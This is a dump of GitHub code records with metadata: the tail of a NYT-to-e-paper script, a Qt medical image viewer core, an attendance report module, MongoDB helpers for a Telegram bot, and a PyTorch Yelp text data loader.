fp.read()\n\n\tassert len(buf) == epd_w * epd_h // 8\n\n\tprint('len buf %d, w*h/8 %d' %(len(buf), epd_w * epd_h //8))\n\n\twith open(file1, 'wb') as fp:\n\t\tfp.write(buf)\n\n\tprint('copy pbm file to webserver ', file2)\n\tprint('copy pdf file to webserver ', file3)\n\t# copy pbm file to web server\n\t# also copy pdf to check thru browser\n\t# IP/nyt_today.pdf\n\n\t# accessing a file is OK; a directory does not work. 403 forbidden. 
config issue likely\n\n\tfrom shutil import copyfile\n\tcopyfile(file1, file2)\n\tcopyfile(pdf_file, file3)\n\n\"\"\"\nhex dump of PBM file Black and White\nP4 then the bitmap starts\n000000 50 34 0a 34 30 30 20 33 30 30 0a 00 00 00 00 00 P4.400 300......\n\"\"\"\n\n", "repo_name": "pabou38/NYT", "sub_path": "big.py", "file_name": "big.py", "file_ext": "py", "file_size_in_byte": 5864, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "31", "api": [{"api_name": "datetime.datetime.now", "line_number": 24, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 24, "usage_type": "attribute"}, {"api_name": "sys.executable", "line_number": 30, "usage_type": "attribute"}, {"api_name": "platform.node", "line_number": 34, "usage_type": "call"}, {"api_name": "datetime.date.today", "line_number": 80, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 80, "usage_type": "name"}, {"api_name": "requests.head", "line_number": 104, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 109, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 124, "usage_type": "call"}, {"api_name": "pdf2image.convert_from_path", "line_number": 136, "usage_type": "call"}, {"api_name": "PIL.ImageFilter.DETAIL", "line_number": 174, "usage_type": "attribute"}, {"api_name": "PIL.ImageFilter", "line_number": 174, "usage_type": "name"}, {"api_name": "platform.node", "line_number": 188, "usage_type": "call"}, {"api_name": "shutil.copyfile", "line_number": 215, "usage_type": "call"}, {"api_name": "shutil.copyfile", "line_number": 216, "usage_type": "call"}]}
+{"seq_id": "37597600743", "text": "\"\"\"Main components of PySeus.\n\nClasses\n-------\n\n**PySeus** - The main application class.\n\"\"\"\n\nimport os\nimport cv2\n\nfrom PySide2.QtCore import QTimer\nfrom PySide2.QtWidgets import QApplication, QMessageBox\n\nfrom .modes import Grayscale\nfrom .formats import Raw, NumPy, H5, DICOM, NIfTI, LoadError\nfrom .settings import settings\nfrom .tools import AreaTool, LineTool\nfrom .ui import MainWindow\nfrom .ui.meta import MetaWindow\nfrom .ui.process import ProcessDialog\nfrom .settings import DataType\n\n\nclass PySeus():\n\n \"\"\"The main application class acts as front controller.\"\"\"\n\n def __init__(self, gui=True):\n\n self.qt_app = None\n \"\"\"The QApplication instance for interaction with the Qt framework.\"\"\"\n\n if isinstance(QApplication.instance(), type(None)):\n self.qt_app = QApplication([])\n else:\n self.qt_app = QApplication.instance()\n\n self.formats = [H5, DICOM, NIfTI, NumPy, Raw]\n \"\"\"List of all avaiable data formats.\n See `Formats `_.\"\"\"\n\n self.modes = [Grayscale]\n \"\"\"List of all avaiable display modes.\n See `Display `_.\"\"\"\n\n self.tools = [AreaTool, LineTool]\n \"\"\"List of all avaiable evaluation tools.\n See `Tools `_.\"\"\"\n\n self.dataset = None\n \"\"\"The current dataset object.\n See `Formats `_.\"\"\"\n\n self.dataset_processed = None\n \"\"\"The temporary processed dataset.\n \"\"\"\n\n self.mode = Grayscale()\n \"\"\"The display mode object.\n See `Display `_.\"\"\"\n\n self.tool = None\n \"\"\"The current tool object.\n See `Tools `_.\"\"\"\n\n self.window = MainWindow(self)\n \"\"\"The main window object.\n See `Interface `_.\"\"\"\n\n self.meta_window = None\n \"\"\"Holds the meta window object.\"\"\"\n\n self.process_window = None\n \"\"\"Holds the process diaglog object for denoising and reconstruction.\"\"\"\n\n self.data_type = DataType.IMAGE\n \"\"\"\"IMAGE\" or \"KSPACE\" Enum of data which is loaded from the file,\n influences GUI representation of data and file load\n dialogues\"\"\"\n\n self.slice = -1\n \"\"\"Index of the current slice.\"\"\"\n\n self.timer = QTimer()\n \"\"\"Timer for cine view.\"\"\"\n\n self.gui = gui\n \"\"\"Flag wheter to use the GUI or not.\"\"\"\n\n # Stylesheet\n style_path = \"./ui/\" + settings[\"ui\"][\"style\"] + \".qss\"\n style_path = os.path.join(os.path.dirname(__file__), style_path)\n with open(style_path, \"r\") as stylesheet:\n self.qt_app.setStyleSheet(stylesheet.read())\n\n self.qt_app.font().setPixelSize(int(settings[\"ui\"][\"font_size\"]))\n\n if self.gui:\n self.window.show()\n\n def show(self):\n \"\"\"Show the main window, even if initialized without the GUI.\"\"\"\n if not self.gui:\n self.window.show()\n self.gui = True\n\n self.qt_app.exec_()\n\n def load_file(self, path, data_type=DataType.IMAGE):\n \"\"\"Try to load the file at *path*. See also *setup_dataset*.\"\"\"\n self.data_type = data_type\n self.mode.set_source(self.data_type)\n\n new_dataset = None\n for format_ in self.formats:\n if format_.can_handle(path):\n new_dataset = format_()\n break\n\n if new_dataset is not None:\n self.setup_dataset(path, new_dataset)\n\n else:\n QMessageBox.warning(self.window, \"Pyseus\", \"Unknown file format.\")\n\n def load_data(self, data, data_type=DataType.IMAGE):\n \"\"\"Try to load *data*. 
See also *setup_dataset*.\"\"\"\n self.data_type = data_type\n self.mode.set_source(self.data_type)\n\n new_dataset = Raw()\n self.setup_dataset(data, new_dataset)\n\n def setup_dataset(self, arg, dataset=None):\n \"\"\"Setup a new dataset: Load scan list, generate thumbnails and load\n default scan.\"\"\"\n if dataset is None:\n dataset = self.dataset\n\n try:\n if not dataset.load(arg, self.data_type): # canceled by user\n return\n\n self.clear()\n self.dataset = dataset\n\n if self.dataset.scan_count() > 1:\n message = \"{} scans detected. Do you want to load all?\" \\\n .format(self.dataset.scan_count())\n load_all = QMessageBox.question(None, \"Pyseus\", message)\n\n self.window.thumbs.clear()\n if load_all is QMessageBox.StandardButton.Yes:\n for scan_id in range(0, self.dataset.scan_count()):\n thumb = self.mode.generate_thumb(\n self.dataset.get_scan_thumbnail(scan_id),\n int(settings[\"ui\"][\"thumb_size\"]))\n pixmap = self.mode.get_pixmap(thumb)\n self.window.thumbs.add_thumb(pixmap)\n else:\n single_scan = self.dataset.scans[self.dataset.scan]\n self.dataset.scans = [single_scan]\n self.dataset.scan = 0\n\n self.load_scan()\n\n except LoadError as error:\n QMessageBox.warning(self.window, \"Pyseus\", str(error))\n\n except OSError as error:\n QMessageBox.warning(self.window, \"Pyseus\", str(error))\n\n else:\n self.window.info.update_path(self.dataset.path)\n\n def refresh(self):\n \"\"\"Refresh the displayed image.\"\"\"\n if self.slice == -1:\n return\n data = self.dataset.get_pixeldata(self.slice)\n # @TODO move to FormatBase (get_pixeldata_adjusted)\n spacing = self.dataset.get_spacing()\n if spacing[0] != spacing[1]:\n if spacing[0] > spacing[1]:\n size = (int(data.shape[0] * spacing[0] / spacing[1]),\n int(data.shape[1]))\n else:\n size = (int(data.shape[0]),\n int(data.shape[1] * spacing[1] / spacing[0]))\n data = cv2.resize(data, size)\n\n pixmap = self.mode.get_pixmap(data)\n\n if self.tool is not None:\n pixmap = self.tool.draw_overlay(pixmap)\n\n self.window.view.set(pixmap)\n\n def recalculate(self):\n \"\"\"Refresh the active evaluation tool.\"\"\"\n if self.tool is not None:\n slice_ = self.dataset.get_pixeldata(self.slice)\n self.tool.recalculate(\n self.mode.prepare_raw(slice_))\n\n def select_scan(self, sid, relative=False):\n \"\"\"Select and load a scan from the current dataset.\n See also *load_scan*.\"\"\"\n if self.dataset is None:\n return\n\n new_scan = self.dataset.scan + sid if relative is True else sid\n if 0 <= new_scan < self.dataset.scan_count():\n self.clear_tool()\n self.load_scan(new_scan)\n\n def load_scan(self, sid=None):\n \"\"\"Load a scan from the current dataset.\"\"\"\n old_sid = self.dataset.scan\n\n if sid is None:\n sid = self.dataset.scan\n self.dataset.load_scan(sid)\n\n if self.slice >= self.dataset.slice_count() or self.slice == -1:\n self._set_slice(self.dataset.slice_count() // 2)\n\n if self.dataset.scan_count() > 1:\n old_thumb = self.window.thumbs.thumbs[old_sid]\n new_thumb = self.window.thumbs.thumbs[sid]\n old_thumb.setStyleSheet(\"border: 1px solid transparent\")\n new_thumb.setStyleSheet(\"border: 1px solid #aaa\")\n\n default_metadata = self.dataset.get_metadata(\"DEFAULT\")\n self.window.meta.update_meta(default_metadata,\n len(default_metadata) > 0)\n self.window.info.update_scan(self.dataset.scans[sid])\n\n self.mode.setup_window(self.dataset.get_pixeldata())\n self.refresh()\n self.window.view.zoom_fit()\n\n def select_slice(self, sid, relative=False):\n \"\"\"Select and display a slice from the current scan.\"\"\"\n 
if self.dataset is None:\n return\n\n new_slice = self.slice + sid if relative is True else sid\n if 0 <= new_slice < self.dataset.slice_count():\n self._set_slice(new_slice)\n self.refresh()\n self.recalculate()\n\n def _set_slice(self, sid):\n \"\"\"Set the current slice index.\"\"\"\n self.window.info.update_slice(sid, self.dataset.slice_count())\n self.slice = sid\n\n def get_slice_id(self):\n return self.slice\n\n def show_metadata_window(self):\n \"\"\"Show the metadata window.\n See `Interface `_.\"\"\"\n self.meta_window = MetaWindow(self, self.dataset.get_metadata())\n self.meta_window.show()\n\n def show_process_window(self, proc_type):\n \"\"\"Show the process window.\"\"\"\n self.process_window = ProcessDialog(self, proc_type)\n self.process_window.show()\n\n def set_processed_dataset(self, dataset):\n \"\"\"Save processed data in Dataset after confirmation in ProcessDialog.\"\"\"\n\n if self.data_type == DataType.IMAGE:\n\n self.load_data(dataset, DataType.IMAGE)\n\n elif self.data_type == DataType.KSPACE:\n\n self.load_data(dataset, DataType.IMAGE)\n\n self.refresh()\n self.window.view.zoom_fit()\n\n def clear(self):\n \"\"\"Reset the application.\"\"\"\n self.dataset = None\n self.slice = -1\n self.window.view.set(None)\n self.window.thumbs.clear()\n self.clear_tool()\n\n def clear_tool(self):\n \"\"\"Reset the active evaluation tool.\"\"\"\n if self.tool is not None:\n self.tool.clear()\n\n def rotate(self, axis):\n \"\"\"Rotate the pixeldata of the current scan in 3D.\"\"\"\n self.dataset.rotate(axis)\n if not axis == 2:\n self._set_slice(self.dataset.slice_count() // 2)\n\n self.refresh()\n self.window.view.zoom_fit()\n self.clear_tool()\n\n def flip(self, direction):\n \"\"\"Flip the pixeldata of the current scan.\"\"\"\n self.dataset.flip(direction)\n\n self.refresh()\n self.clear_tool()\n\n def toggle_cine(self):\n \"\"\"Toggle automatic loading of next scans.\"\"\"\n if self.timer.isActive():\n self.timer.stop()\n else:\n self.timer.timeout.connect(self._cine_next)\n self.timer.start(int(settings[\"cine\"][\"interval\"]))\n\n def _cine_next(self):\n self.select_scan(1, True)\n", "repo_name": "IMTtugraz/PySeus", "sub_path": "pyseus/core.py", "file_name": "core.py", "file_ext": "py", "file_size_in_byte": 10502, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "31", "api": [{"api_name": "PySide2.QtWidgets.QApplication.instance", "line_number": 34, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets.QApplication", "line_number": 34, "usage_type": "name"}, {"api_name": "PySide2.QtWidgets.QApplication", "line_number": 35, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets.QApplication.instance", "line_number": 37, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets.QApplication", "line_number": 37, "usage_type": "name"}, {"api_name": "formats.H5", "line_number": 39, "usage_type": "name"}, {"api_name": "formats.DICOM", "line_number": 39, "usage_type": "name"}, {"api_name": "formats.NIfTI", "line_number": 39, "usage_type": "name"}, {"api_name": "formats.NumPy", "line_number": 39, "usage_type": "name"}, {"api_name": "formats.Raw", "line_number": 39, "usage_type": "name"}, {"api_name": "modes.Grayscale", "line_number": 43, "usage_type": "name"}, {"api_name": "tools.AreaTool", "line_number": 47, "usage_type": "name"}, {"api_name": "tools.LineTool", "line_number": 47, "usage_type": "name"}, {"api_name": "modes.Grayscale", "line_number": 59, "usage_type": "call"}, {"api_name": "ui.MainWindow", "line_number": 67, 
"usage_type": "call"}, {"api_name": "settings.DataType.IMAGE", "line_number": 77, "usage_type": "attribute"}, {"api_name": "settings.DataType", "line_number": 77, "usage_type": "name"}, {"api_name": "PySide2.QtCore.QTimer", "line_number": 85, "usage_type": "call"}, {"api_name": "settings.settings", "line_number": 92, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 93, "usage_type": "call"}, {"api_name": "os.path", "line_number": 93, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 93, "usage_type": "call"}, {"api_name": "settings.settings", "line_number": 97, "usage_type": "name"}, {"api_name": "settings.DataType.IMAGE", "line_number": 110, "usage_type": "attribute"}, {"api_name": "settings.DataType", "line_number": 110, "usage_type": "name"}, {"api_name": "PySide2.QtWidgets.QMessageBox.warning", "line_number": 125, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets.QMessageBox", "line_number": 125, "usage_type": "name"}, {"api_name": "settings.DataType.IMAGE", "line_number": 127, "usage_type": "attribute"}, {"api_name": "settings.DataType", "line_number": 127, "usage_type": "name"}, {"api_name": "formats.Raw", "line_number": 132, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets.QMessageBox.question", "line_number": 151, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets.QMessageBox", "line_number": 151, "usage_type": "name"}, {"api_name": "PySide2.QtWidgets.QMessageBox.StandardButton", "line_number": 154, "usage_type": "attribute"}, {"api_name": "PySide2.QtWidgets.QMessageBox", "line_number": 154, "usage_type": "name"}, {"api_name": "settings.settings", "line_number": 158, "usage_type": "name"}, {"api_name": "formats.LoadError", "line_number": 168, "usage_type": "name"}, {"api_name": "PySide2.QtWidgets.QMessageBox.warning", "line_number": 169, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets.QMessageBox", "line_number": 169, "usage_type": "name"}, {"api_name": "PySide2.QtWidgets.QMessageBox.warning", "line_number": 172, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets.QMessageBox", "line_number": 172, "usage_type": "name"}, {"api_name": "cv2.resize", "line_number": 191, "usage_type": "call"}, {"api_name": "ui.meta.MetaWindow", "line_number": 266, "usage_type": "call"}, {"api_name": "ui.process.ProcessDialog", "line_number": 271, "usage_type": "call"}, {"api_name": "settings.DataType.IMAGE", "line_number": 277, "usage_type": "attribute"}, {"api_name": "settings.DataType", "line_number": 277, "usage_type": "name"}, {"api_name": "settings.DataType.IMAGE", "line_number": 279, "usage_type": "attribute"}, {"api_name": "settings.DataType", "line_number": 279, "usage_type": "name"}, {"api_name": "settings.DataType.KSPACE", "line_number": 281, "usage_type": "attribute"}, {"api_name": "settings.DataType", "line_number": 281, "usage_type": "name"}, {"api_name": "settings.DataType.IMAGE", "line_number": 283, "usage_type": "attribute"}, {"api_name": "settings.DataType", "line_number": 283, "usage_type": "name"}, {"api_name": "settings.settings", "line_number": 324, "usage_type": "name"}]}
+{"seq_id": "36436013102", "text": "import pandas as pd\r\nimport datetime\r\nimport time\r\nimport os\r\nimport pickle\r\nimport shutil\r\n\r\n# import matplotlib.pyplot as plt\r\n\r\ndef get_today_att_percentage():\r\n ts = time.time()\r\n date = datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d')\r\n csv_file_path = './Data/reports/'+date+'.csv'\r\n pickle_file_path = './Data/encodings/face_names.pkl'\r\n x = int()\r\n y = int() \r\n if checkfile(csv_file_path):\r\n if checkfile(pickle_file_path):\r\n x = get_total_students(pickle_file_path)\r\n y = get_total_col(csv_file_path)\r\n return (y/x)*100\r\n else:\r\n print(\"There are no students registered \")\r\n else:\r\n print(\"Today's attendance not taken yet\")\r\n\r\n\r\ndef get_total_students(pickle_file_path): \r\n with open(pickle_file_path, \"rb\") as f:\r\n face_names = pickle.load(f)\r\n known_face_names = face_names\r\n return len(known_face_names)\r\n \r\ndef get_total_col(csv_path):\r\n df = pd.read_csv(csv_path)\r\n return len(df)\r\n\r\n\r\n\r\n\r\n#return as list contain attendace taken dates\r\ndef get_all_att_reports_list():\r\n reports_list = []\r\n directory = './Data/reports'\r\n for filename in os.listdir(directory):\r\n if filename.endswith(\".csv\"):\r\n reports_list.append(filename)\r\n return reports_list\r\n\r\n\r\n#checks whether the given file is present or not\r\ndef checkfile(file_path):\r\n if(os.path.isfile(file_path)):\r\n return True\r\n else:\r\n return False\r\n\r\n#get all repots to desktop #NOTEEEEEEEEEE ::: USE SHUTIL.copytree\r\ndef get_all_reports_desktop():\r\n desktop_path = os.path.expanduser(\"~\\\\Desktop\")\r\n desktop_path = desktop_path + '\\\\FRAS_ALL_REPORTS'\r\n if os.path.isdir(desktop_path): \r\n shutil.rmtree(desktop_path)\r\n\r\n os.mkdir(desktop_path)\r\n for file_name in get_all_att_reports_list():\r\n shutil.copy2('./Data/reports/'+file_name, desktop_path)\r\n return 1\r\n\r\n\r\n\r\ndef get_all_reports_avg():\r\n percentage_list = []\r\n x= 0\r\n for date in get_all_att_reports_list():\r\n date = date[:-4]\r\n percentage_list.append(get_desday_att_percentage(str(date)))\r\n for per in percentage_list:\r\n x=x+per\r\n return x/len(percentage_list)\r\n\r\n\r\n\r\n\r\n\r\ndef get_desday_att_percentage(date):\r\n csv_file_path = './Data/reports/'+date+'.csv'\r\n pickle_file_path = './Data/encodings/face_names.pkl'\r\n x = int()\r\n y = int() \r\n if checkfile(csv_file_path):\r\n if checkfile(pickle_file_path):\r\n x = get_total_students(pickle_file_path)\r\n y = get_total_col(csv_file_path)\r\n return (y/x)*100\r\n else:\r\n print(\"There are no students registered \")\r\n else:\r\n print(\"Today's attendance not taken \")\r\n\r\n\r\n\r\n# def get_specific_day_att_per(date):\r\n# return get_desday_att_percentage(date)\r\n\r\n\r\ndef get_specific_day_att_per(date):\r\n if checkfile('./Data/reports/'+date+'.csv'):\r\n return get_desday_att_percentage(date)\r\n else:\r\n return \"Report not exist !\"\r\n\r\n\r\ndef get_specific_day_reports_desktop(date):\r\n desktop_path = os.path.expanduser(\"~\\\\Desktop\")\r\n desktop_path = desktop_path + '\\\\'+date+'.csv'\r\n file_path = \"./Data/reports/\"+date+\".csv\"\r\n if os.path.isdir(desktop_path): \r\n shutil.rmtree(desktop_path)\r\n if checkfile(file_path):\r\n shutil.copy2(file_path, desktop_path)\r\n return date+\": Report Sucessfully stored at Location :: /desktop/\"\r\n else:\r\n return \"Report not exist !\"", "repo_name": "idileepd/Face-Recognition-Based-Attendance-System", "sub_path": "Software/get_reports.py", "file_name": 
"get_reports.py", "file_ext": "py", "file_size_in_byte": 3521, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "31", "api": [{"api_name": "time.time", "line_number": 11, "usage_type": "call"}, {"api_name": "datetime.datetime.fromtimestamp", "line_number": 12, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 12, "usage_type": "attribute"}, {"api_name": "pickle.load", "line_number": 30, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 35, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 45, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 53, "usage_type": "call"}, {"api_name": "os.path", "line_number": 53, "usage_type": "attribute"}, {"api_name": "os.path.expanduser", "line_number": 60, "usage_type": "call"}, {"api_name": "os.path", "line_number": 60, "usage_type": "attribute"}, {"api_name": "os.path.isdir", "line_number": 62, "usage_type": "call"}, {"api_name": "os.path", "line_number": 62, "usage_type": "attribute"}, {"api_name": "shutil.rmtree", "line_number": 63, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 65, "usage_type": "call"}, {"api_name": "shutil.copy2", "line_number": 67, "usage_type": "call"}, {"api_name": "os.path.expanduser", "line_number": 115, "usage_type": "call"}, {"api_name": "os.path", "line_number": 115, "usage_type": "attribute"}, {"api_name": "os.path.isdir", "line_number": 118, "usage_type": "call"}, {"api_name": "os.path", "line_number": 118, "usage_type": "attribute"}, {"api_name": "shutil.rmtree", "line_number": 119, "usage_type": "call"}, {"api_name": "shutil.copy2", "line_number": 121, "usage_type": "call"}]}
+{"seq_id": "25979270074", "text": "\"\"\"\nThis is just that part that deals with very basic search queries to mongodb.\nThe reason behind including these functions is that they were used multiple\ntimes in the code.\n\"\"\"\n\nimport logging\nfrom typing import Tuple, Union\n\nfrom loader import queues, teams, users\n\n\nasync def get_team_id(user_id: int) -> Union[int, None]:\n \"\"\"Return the team id of a user based on their user id.\"\"\"\n data = await users.find_one(\n {\"user_id\": user_id},\n {\"team_id\": 1, \"_id\": 0},\n )\n\n if data:\n team_id = data.get(\"team_id\")\n else:\n team_id = None\n\n return team_id\n\n\nasync def get_team_members(user_id: int) -> dict:\n \"\"\"Return the team members a user has based on their user id.\"\"\"\n team_id = await get_team_id(user_id)\n team_data = await teams.find_one(\n {\"id\": team_id},\n {\"members\": 1, \"_id\": 0},\n )\n members = team_data[\"members\"]\n\n return members\n\n\nasync def get_team_chat(user_id: int) -> Union[int, None]:\n \"\"\"Return the team's Telegram group chat id.\"\"\"\n team_id = await get_team_id(user_id)\n team_data = await teams.find_one(\n {\"id\": team_id},\n {\"group_chat_id\": 1, \"_id\": 0},\n )\n\n try:\n group_chat_id = team_data[\"group_chat_id\"]\n except KeyError:\n group_chat_id = None\n\n return group_chat_id\n\n\nasync def get_queue_array(team_id: int, queue_name: str) -> list:\n \"\"\"Return queue array for a team's specific queue.\"\"\"\n queues_data = await queues.find_one(\n {\"id\": team_id},\n {\"queues\": 1, \"_id\": 0},\n )\n queue_array = queues_data[\"queues\"][queue_name]\n\n return queue_array\n\n\nasync def get_queue_list(queue_array: list) -> str:\n \"\"\"Return the queue list using the queue array.\"\"\"\n queue_list = \"\"\n for index, member in enumerate(queue_array, start=1):\n name = member[\"name\"]\n current_turn = member[\"current_turn\"]\n\n if current_turn:\n queue_list += f\"{index}. {name} \\n\"\n else:\n queue_list += f\"{index}. 
{name}\\n\"\n\n return queue_list\n\n\nasync def get_setup_person(team_id: int) -> str:\n \"\"\"Return the name of the setup person (aka admin) in a team\"\"\"\n setup_person = await users.find_one(\n {\"user_id\": team_id},\n {\"name\": 1, \"_id\": 0},\n )\n\n return setup_person[\"name\"]\n\n\nasync def get_current_turn(queue_array: list) -> Tuple[int, str, int]:\n \"\"\"Get the person whose turn it is to do the chore in a queue.\n\n Returns\n -------\n Tuple[int, str, int]\n A tuple of form: (user_id, user_name, index_position)\n \"\"\"\n for index, member in enumerate(queue_array):\n if member[\"current_turn\"]:\n data: Tuple[int, str, int] = (member[\"user_id\"], member[\"name\"], index)\n return data\n\n logging.error(\"Current turn person not found.\")\n return (0, \"\", 0)\n", "repo_name": "dkmlv/maid-tg-bot", "sub_path": "utils/get_db_data.py", "file_name": "get_db_data.py", "file_ext": "py", "file_size_in_byte": 2847, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "loader.users.find_one", "line_number": 15, "usage_type": "call"}, {"api_name": "loader.users", "line_number": 15, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 13, "usage_type": "name"}, {"api_name": "loader.teams.find_one", "line_number": 31, "usage_type": "call"}, {"api_name": "loader.teams", "line_number": 31, "usage_type": "name"}, {"api_name": "loader.teams.find_one", "line_number": 43, "usage_type": "call"}, {"api_name": "loader.teams", "line_number": 43, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 40, "usage_type": "name"}, {"api_name": "loader.queues.find_one", "line_number": 58, "usage_type": "call"}, {"api_name": "loader.queues", "line_number": 58, "usage_type": "name"}, {"api_name": "loader.users.find_one", "line_number": 84, "usage_type": "call"}, {"api_name": "loader.users", "line_number": 84, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 102, "usage_type": "name"}, {"api_name": "logging.error", "line_number": 105, "usage_type": "call"}, {"api_name": "typing.Tuple", "line_number": 92, "usage_type": "name"}]}
+{"seq_id": "20599829602", "text": "import numpy as np\nimport torch\nimport torch.utils.data as data\nimport config\nfrom tqdm import tqdm\n\nPAD_TOKEN = \"\"\nUNK_TOKEN = \"\"\nSTART_TOKEN = \"\"\nSTOP_TOKEN = \"\"\n\nPAD_ID = 0\nUNK_ID = 1\nSTART_ID = 2\nSTOP_ID = 3\n\n\ndef build_vocab(file_paths, max_vocab_size=50000, glove_path=None):\n counter = dict()\n word2embedding = dict()\n for file_path in file_paths:\n with open(file_path, \"r\", encoding=\"utf-8\") as f:\n for line in f:\n words = line.split()\n for word in words:\n if word not in counter:\n counter[word] = 1\n else:\n counter[word] += 1\n\n sorted_vocab = sorted(counter.items(), key=lambda kv: kv[1], reverse=True)\n sorted_vocab = sorted_vocab[:max_vocab_size]\n word2idx = {word: i for i, (word, freq) in enumerate(sorted_vocab, start=4)}\n word2idx[PAD_TOKEN] = 0\n word2idx[UNK_TOKEN] = 1\n word2idx[START_TOKEN] = 2\n word2idx[STOP_TOKEN] = 3\n idx2word = {i: word for word, i in word2idx.items()}\n\n with open(glove_path, \"r\", encoding=\"utf-8\") as f:\n for line in tqdm(f, total=int(2.2e6)):\n if config.debug:\n break\n word_vec = line.split(\" \")\n word = word_vec[0]\n vec = np.array(word_vec[1:], dtype=np.float32)\n word2embedding[word] = vec\n\n embedding = np.zeros((len(word2idx), 300), dtype=np.float32)\n for word, vec in word2embedding.items():\n if config.debug:\n break\n try:\n idx = word2idx[word]\n embedding[idx] = vec\n except KeyError:\n continue\n\n return word2idx, idx2word, embedding\n\n\nclass YelpDataset(data.Dataset):\n def __init__(self, pos_file_path, neg_file_path, word2idx, debug=False):\n pos_seqs = open(pos_file_path, \"r\", encoding=\"utf-8\").readlines()\n neg_seqs = open(neg_file_path, \"r\", encoding=\"utf-8\").readlines()\n pos_seqs = list(map(lambda line: line.strip(), pos_seqs))\n neg_seqs = list(map(lambda line: line.strip(), neg_seqs))\n\n pos_labels = np.ones((len(pos_seqs), 1))\n neg_labels = np.zeros((len(neg_seqs), 1))\n self.seqs = pos_seqs + neg_seqs\n self.labels = np.concatenate([pos_labels, neg_labels], axis=0)\n self.num_total_seqs = len(self.seqs)\n self.word2idx = word2idx\n if debug:\n self.seqs = self.seqs[:100]\n self.labels = self.labels[:100]\n self.num_total_seqs = len(self.seqs)\n\n def __getitem__(self, index):\n seq = self.seqs[index]\n label = torch.LongTensor(self.labels[index])\n seq = self.words2ids(seq)\n return seq, label\n\n def __len__(self):\n return self.num_total_seqs\n\n def words2ids(self, sentence):\n tokens = sentence.lower().split()\n sequence = []\n for token in tokens:\n if token in self.word2idx:\n sequence.append(self.word2idx[token])\n else:\n sequence.append(self.word2idx[UNK_TOKEN])\n sequence.append(self.word2idx[STOP_TOKEN])\n sequence = torch.Tensor(sequence)\n return sequence\n\n\ndef collate_fn(data):\n def merge(sequences):\n lengths = [len(seq) for seq in sequences]\n padded_seq = torch.zeros(len(sequences), max(lengths), dtype=torch.long)\n for i, seq in enumerate(sequences):\n end = lengths[i]\n padded_seq[i, :end] = seq[:end]\n return padded_seq, lengths\n\n data.sort(key=lambda x: len(x[0]), reverse=True)\n\n seqs, labels = zip(*data)\n seqs, seq_lens = merge(seqs)\n labels = torch.cat(labels, dim=0)\n\n return seqs, seq_lens, labels\n\n\ndef get_loader(pos_file_path, neg_file_path,\n word2idx, batch_size=32,\n debug=False, shuffle=True):\n\n dataset = YelpDataset(pos_file_path, neg_file_path, word2idx, debug=debug)\n data_loader = data.DataLoader(dataset,\n batch_size=batch_size,\n shuffle=shuffle,\n collate_fn=collate_fn)\n return 
data_loader\n", "repo_name": "Holmeswww/CPTG", "sub_path": "data_utils.py", "file_name": "data_utils.py", "file_ext": "py", "file_size_in_byte": 4171, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "tqdm.tqdm", "line_number": 41, "usage_type": "call"}, {"api_name": "config.debug", "line_number": 42, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 46, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 49, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 49, "usage_type": "attribute"}, {"api_name": "config.debug", "line_number": 51, "usage_type": "attribute"}, {"api_name": "torch.utils.data.Dataset", "line_number": 62, "usage_type": "attribute"}, {"api_name": "torch.utils.data", "line_number": 62, "usage_type": "name"}, {"api_name": "numpy.ones", "line_number": 69, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 70, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 72, "usage_type": "call"}, {"api_name": "torch.LongTensor", "line_number": 82, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 98, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 105, "usage_type": "call"}, {"api_name": "torch.long", "line_number": 105, "usage_type": "attribute"}, {"api_name": "torch.utils.data.sort", "line_number": 111, "usage_type": "call"}, {"api_name": "torch.utils.data", "line_number": 111, "usage_type": "name"}, {"api_name": "torch.utils.data", "line_number": 113, "usage_type": "name"}, {"api_name": "torch.cat", "line_number": 115, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 125, "usage_type": "call"}, {"api_name": "torch.utils.data", "line_number": 125, "usage_type": "name"}]}
